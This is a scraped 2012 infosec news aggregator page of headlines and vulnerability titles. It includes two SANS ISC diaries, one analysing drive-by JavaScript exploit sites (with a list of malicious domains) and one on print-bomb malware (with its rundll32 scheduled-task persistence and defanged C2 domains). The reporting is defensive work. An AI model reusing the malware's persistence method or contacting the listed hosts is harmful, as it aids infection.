Hackin9

InfoSec News

Google's CEO Larry Page has lost his voice and will not be speaking at the company's upcoming public events, a spokeswoman for the company said on Thursday.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
 
A hacktivist group known as UGNazi claims responsibility for multiple Twitter outages today, though Twitter has denied any attacks on its service.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
Twitter was forced to roll back its software to a previous stable version on Thursday in order to restore service after a two-hour outage, one of its engineers said in a blog post.
 
A California court will limit the number of exhibits Apple and Samsung are able to submit when their multifaceted patent infringement case comes before a jury next month.
 
Moonlight Prior to 2.4.1/3.99.3 Multiple Security Vulnerabilities
 
Mono ASP.NET 'mod_mono' Source Code Information Disclosure Vulnerability
 

Ars Technica

With 16 petaflops and 1.6M cores, DOE supercomputer is world's ...
Ars Technica
INFOSEC Analyst - DIRECT LABOR: LA-NEW ORLEANS, Senior lead or support for Information Security (INFOSEC) and trusted systems techno… See more job ...

 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Iran's intelligence minister has accused the U.S., the U.K. and Israel of planning a "massive cyberattack" against his country after talks this week over Iran's nuclear program failed to reach an agreement, Iranian state TV reported on Thursday.
 
Microsoft is dumping its Office Starter edition as Windows 8 and the next edition of the suite, dubbed Office 2013, near completion and release later this year and early next
 
Globus Toolkit GridFTP 'getpwnam_r()' Security Bypass Vulnerability
 
I thought I'd subtitle this diary more humorously as The Twelve Ways of Pwnmas in celebration of June-uary here in the Seattle area, where it really does rain all the time.
I am priviliged to be party to a wide variety of data and telemetry for malfeasance and evil. One source in particular in use at Microsoft is a list of drive-by attack URLs discovered via detection technology utilized by MSRC Engineering.

From this feed I selected twelve (with me here on the theme?) unique URLs detected as drive-by exploit delivery vehicles bountiful in malicious JavaScript. Unfortunately the reporting for the tool is currently limited only to a basic yes or no response regarding a URL's maliciousness. As such I wanted to dig in to learn more about the attributes of these attacks and share them with you here. To do so I used a specifically configured VM and copied the appropriate obfuscated content between script I'm glad to do so by request. I'm also glad to share samples as requested.
Such a story is better told with pictures, in keeping with the depth of my analysis skills, but first some notes of interest:

While the likes of the JS/Mult family indicates malicious JavaScript written to exploit multiple vulnerabilities (Adobe, Java, etc.), almost all these exploits universally favor exploiting Internet Explorer vulnerabilities such as CVE-2010-0249, CVE-2010-0806, and CVE-2009-0075. CVE-2010-0249, aka HTML Object Memory Corruption Vulnerability was used during Operation Aurora. If you followed Aurora closely back in the day, you'll likely find the country of origin statistics below of no surprise. CVE-2010-0806 was addressed in MS10-018 and and CVE-2009-0075 was addressed in MS09-002 to correct Internet Explorer issues described as unitialized memory corruption vulnerabilities. For what are vulnerabilities where updates were issued as much as three years ago, clearly enough unpatched systems remain to warrant such common exploitation.
Six of twelve samples exhibit signs of exact code reuse (Exploit:JS/AdoStream), and a seventh is a very slight variant (Exploit:JS/Mult.EA). Additional reference reading for the samples detected: Exploit:JS/AdoStream

The details on the domains of nefariousness are as follows:





Domain
Analysis Links
VTdetections (of 42)


www.kasuidojo.com.ar
Exploit:JS/AdoStream
32


www.ascororadea.ro
Exploit:JS/AdoStream
32


www.suportemetrocard.com.br
Exploit:JS/AdoStream
31


pacoaraujodesign.com.br
Exploit:JS/AdoStream
30


www.czgtgj.com
Exploit:JS/CVE-2010-0806.B
30


www.stubllanet.com
Exploit:JS/AdoStream
30


elnido.realtyworldphils.com
Exploit:JS/AdoStream
29


mj.zhuhai.gd.cn
Exploit:JS/CVE-2010-0806.gen!A
27


www.meydanoptik.com
Exploit:JS/Mult.EA
26


voteforomega.info
Exploit:JS/Cripac.A
13


space.argstorm.com
Exploit:JS/Mult.CR
9


fedeteniselsalvador.com
Mal/JSBO-Gen
5



Because infographics are all the rage:


These samples also presented a great opportunity to use an ISCHandler favorite. When you suspect code reuse or matching, Jesse Kornblum's ssdeep is an ideal tool with which to validate your assumption. As seen above, I stated that the malicious JS from six of the twelve URLs was identical. Comparing the sample (Exploit:JS/AdoStream) from Germany against the sample from Brazil proved to be a 97% match.

The Exploit:JS/Mult.EA sample was also noted as a slight variant of Exploit:JS/AdoStream. Using the German sample to compare against the slight variant from Turkey showed a 94% match.

I found it interesting that the very slight difference in JS resulted in four less detections by AVvendors. Here's the VT detection for www.meydanoptik.com sample (Exploit:JS/Mult.EA) versus the VT detection for www.stubllanet.com sample (Exploit:JS/AdoStream).
The diff between the two files as seen below shows only that the www.meydanoptik.com sample sets a cookie while www.stubllanet.com does not.

You get the idea. There are clearly commonalities in vulnerabilities targeted, methods used for exploitation, and even country of origin.
Hopefully you've found this relevant and interesting. Please share any related insight or experience you may have via comments.
Cheers.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Smartphones running Microsoft's upcoming Windows Phone 8 OS will use Qualcomm's Snapdragon S4 processor, the chip maker said.
 
Twitter's microblogging site went down this afternoon, got back up, crashed again and came back up again. The company said it's dealing with an ongoing problem.
 
A U.S. Federal Communications Commission proposal to address the price of dedicated telecom and broadband lines for businesses would stop large telecom carriers from seeking new price flexibility but would not scrap the underlying rules that allow price deregulation, said members of a coalition calling for changes in the rules.
 
Oracle customers hoping that the pending departure of a top company executive will help pave the way for a kinder, gentler sales culture may be engaged in wishful thinking, according to industry observers.
 
CORE-2012-0530 - Lattice Diamond Programmer Buffer Overflow
 
Web app firewalls can?t erase the need for secure application development, but Gartner says WAF patching may have a growing role in the enterprise.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
Young, tech-savvy people pay substantially less attention to online security risks and are therefore more likely to experience security problems than older people.
 
After Microsoft announced this week that it will sell a pair of branded Surface tablets, an analyst suggested that the company is also working with a contract manufacturer to build a Windows Phone 8-based smartphone.
 
Microsoft's new Surface tablets may not match Apple's iPad on battery life, according to estimates made by Computerworld based on comparable devices.
 
It's easy enough to navigate your Mac without any add-ons. You can maneuver around through folders to find what you're after, and use the Spotlight menu to search for files and launch apps more quickly. Power users tend to prefer third-party utilities like LaunchBar ( Macworld rated 5 out of 5 mice ) or Alfred ( Macworld rated 4.5 out of 5 mice ). These are keyboard-driven apps that make quick work of common actions for tech savvy users.
 
Twitter's microblogging site went down this afternoon, got back up, crashed again and came back up again. The company said it's dealing with an ongoing problem.
 
IBM DB2 Multiple Security Vulnerabilities
 
MyBB 'announcements.php' SQL Injection Vulnerability
 
Networking equipment vendor Cisco Systems released multiple security updates on Wednesday to address vulnerabilities in its AnyConnect Secure Mobility Client, ASA 5500 Series Adaptive Security Appliances, Cisco Catalyst 6500 Series ASA Services Module and Cisco Application Control Engine software.
 
Biogas fuel cells will power an extension to eBay's data center in Utah, set to go online around the middle of next year.
 
Windows Phone 8 won't run on existing Windows Phones, which will hurt sales of existing Windows Phone models in the coming months, creating acute problems for the ailing Nokia.
 
Microsoft hopes that full support for C and C++ and the ability to write apps for all Windows devices at the same time will attract more developers to Windows Phone 8.
 
Google has cooperated with universities and linguistic organizations to begin documenting approximately 3,500 languages that are at risk of disappearing in the next 100 years, the company said on Thursday.
 
IBM InfoSphere Guardium Local Denial of Service Vulnerability
 
[ MDVSA-2012:099 ] net-snmp
 
Mybb 1.6.8 'announcements.php' Sql Injection Vulnerabilitiy
 
Facial recognition start-up Face.com patched a vulnerability in its KLINK iOS app that could have allowed attackers to hijack the Facebook and Twitter accounts of its users, according to Ashkan Soltani, the independent security researcher who claims to have found the flaw.
 
Windows Phone 8, coming in the fall, won't run on existing Windows Phones, Microsoft which will hurt sales of existing Windows Phone models in the coming months, creating acute problems for the ailing Nokia.
 
[SECURITY] [DSA 2497-1] quagga security update
 
[ MDVSA-2012:098 ] libxml2
 
IT spending in Europe will virtually grind to a halt this year and next due to economic uncertainty over the euro currency, according to a Forrester Research report released Thursday.
 
With the release of Red Hat Enterprise Linux (RHEL) 6.3, Red Hat has tweaked the enterprise grade Linux distribution to add new capabilities in storage, virtualization, security, scalability and performance.
 
Facial recognition start-up Face.com patched a vulnerability in its KLINK iOS app that could have allowed attackers to hijack the Facebook and Twitter accounts of its users, according to Ashkan Soltani, the independent security researcher who claims to have found the flaw.
 
Business IT is evolving behind your back. Here's how to head off extinction and assert a larger role
 

As the opening day of the 2012 Olympic Games nears, IT teams in the U.K. are busy expanding their companies’ security policies and reviewing their security contingency plans. They are preparing for 17 days of Games, which will surely produce crowded transportation systems, overloaded Internet connections, and employees whose attention may be diverted by swimming relays and equestrian events.

The Olympics provide a good opportunity for companies in the U.S. and around the world to review their security policies and plans, too. Security pros can watch how their peers in the U.K. handle the pressures and disruptions caused by the Olympics, and consider how they would handle such an event if it occurred in their city.

Security contingency plans, which are similar to disaster recovery plans or business continuity plans, lay out the steps IT should take as soon as a disruptive event occurs. The idea is to make important decisions in advance, and have the necessary resources already in place, so the team can react quickly to maintain the security of their company’s data and other IT assets. Yet, according to our application security expert Michael Cobb, many companies’ security contingency plans are either unrealistic or woefully out-of-date.

Could your company continue operating securely in a chaotic environment — whether that chaos is caused by a scheduled event, such as the Olympics, or by an unplanned natural event? The 2012 Olympics serve as a reminder for all firms to review and revise their security contingency plans in light of current concerns and resources.

The relatively quiet summer months may be a good time to set up components of your security contingency plan. One of the most important components to handle in advance is widespread telecommuting. During a major event, more employees may have to work from home. You can prepare now by having all employees sign a remote working policy agreement, test the security of the Internet connection in their home, and receive training on topics, such as securely filing sensitive documents from their home office.

The Olympics also provide a hook for continued security awareness training. The IT department could send out an email educating users about Olympic ticket scams, providing a helpful lesson for any too-good-to-be-true email offer. Or the IT department could run a summertime security contest, posting a short information security quiz on the company’s Intranet and awarding gold, silver and bronze medals to the employees or departments who score highest on the quiz.

Even if the Olympics are not held in the U.S. until at least 2024, there is bound to be a significant event that will affect your company’s security posture in the near future. Prepare and practice now so your security team can execute flawlessly and take home the gold.



Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
A revision to Japan's copyright law to impose criminal penalties on those who illegally download music and movies has sparked debate in the country.
 
The European Parliament's trade committee, INTA, on Thursday decided not to postpone the crucial vote on the controversial anti-piracy agreement, ACTA.
 
IBM AIX Temporary File Creation Vulnerability
 
Self-driving electric taxis, smart appliances and municipal solar power are all amenities enjoyed by the residents of the futuristic Masdar City in the Middle East. Here's how they'll make their way to the U.S.
 
A new group to promote the use of iPhones and iPads in Japanese businesses launched in Tokyo on Thursday.
 
Downloads from China on Apple's App Store have tripled from a year ago, but developers in the country must continue to look overseas to generate revenues, because of the prevalence of free apps, according to an app market analytics firm.
 
A pair of Web metrics firms have traded sharp blows, calling into question how their rival measures browser usage, and whether Microsoft's Internet Explorer or Google's Chrome is the planet's most popular.
 
Business IT is evolving behind your back. Here's how to head off extinction and assert a larger role
 
You might not hear much about SOA anymore, but its imperative to make 'everything a service' is more relevant than ever
 
a
 
Drobo today announced two new storage arrays, including its first portable unit, the Drobo Mini, and a larger array with as much as six times the performance of its predecessors. The company also announced its support for Thunderbolt and USB 3.0.
 
Cisco AnyConnect Secure Mobility Client VPN Downloader Arbitrary Code Execution Vulnerabilities
 
Apple iTunes '.m3u' File Remote Stack Buffer Overflow Vulnerability
 
Aweek ago we mentioned a print bombmalware specimen doing the rounds, with a gradually improving AVdetection ratio. However, we are receiving reports (Thanks Conor!)with variants of what looks like the same malware, with a very reduced AV detection ratio (0/37), so do not relax your defenses.
Virus Total:https://www.virustotal.com/file/90910a49226f6488de42d27ac1b347c68a0d5a9c1b070bf5dfdaea8ac368cfc9/analysis/1340227448/.
This new sample, called xpsp4ress.dll, is stored on C:\Windows\System32 and creates a scheduled task in Windows with what seems to be a random name (e.g. UUSCPK), running C:\WINDOWS\system32\rundll32.exe 'C:\WINDOWS\system32\xpsp4ress.dll' . Then it seems to propagate looking for share folders and/or printers (sometimes the DLLor EXEends up in the spool queue and as a result reproduces the observed garbage printing behavior).
Some of the domains that has been identified when the malware phones home (CC)are:

hxxp://http://somethingclosely.com
hxxp://ads.alpha00001.com
hxxp://storage1.static.itmages.ru
hxxp://storage5.static.itmages.ru

Look for them in your logs. There is a related write up available from Symantec: http://www.symantec.com/business/support/index?page=contentid=TECH190982.
The beauty of this unexpected malware behavior is that it can easily be detected throughout the organization printers and print servers, although at the expense of wasting precious paper, and trees as a consequence. Let's save the planet! ... and don't forget this is a good opportunity to evaluate the security of your printing architecture (network isolation, access controls, printer management, etc).
----

Raul Siles

Founder and Senior Security Analyst with Taddong

www.taddong.com (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Yahoo and Facebook are in negotiations to resolve a patents dispute, an attorney for Yahoo told a federal court on Tuesday.
 
Internet Storm Center Infocon Status